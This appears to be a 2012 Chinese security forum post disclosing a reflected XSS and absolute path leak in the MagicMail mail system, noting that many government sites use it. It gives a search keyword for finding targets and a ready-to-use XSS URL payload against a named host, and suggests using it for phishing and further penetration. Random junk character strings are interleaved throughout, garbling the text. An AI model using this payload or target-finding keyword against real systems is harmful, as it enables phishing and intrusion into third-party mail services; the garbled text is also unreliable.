今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞: W' S5 v3 k4 K/ M# R5 L
, {! Q0 y& T3 E
u8 o! r6 n. |+ T0 r' R: B包含 一个反射性XSS 以及 绝对路径泄漏
2 H0 |' C& z4 A* F: l8 K" {" q/ s看了看 貌似全部是linux的。 @' G1 C. o: }1 d2 b4 k
) t/ a- E4 }! b& r z4 T4 [( d* c关键字:迈捷邮件系统 by MagicMail* ]! B+ R$ }$ t; W
: ]8 A- N0 S- p% y: z C$ Y$ h4 x1 Q
可以看到很多政府网站都用这个邮件系统
, }! k! r6 j4 \: I. F6 M4 |6 _3 l/ t
绝对路径 http://madman.in/index.php?login_type=declare&language=' d. f. ^ c# Z% m- i
2 u6 ?% w6 D. j. a! R7 q# W/ C5 f/ o! ^6 I/ h u; |8 f. `1 q) |
3 P6 _# o& E+ p' Y" jXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E C% ~4 T% J" n& b+ F) W3 j7 B
* `" b5 K3 [2 c
6 e1 B8 F% y: `/ I; {3 \ x) p
2 c% @( ?5 h' E# N3 F- p( w虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等- a# }2 ` L l
2 k+ V4 d; S1 F _1 ^7 m修复方案:看官方补丁吧。6 N! ] s/ C3 O" O0 ?
|
发表于 2012-11-9 20:38:41
收藏
支持
反对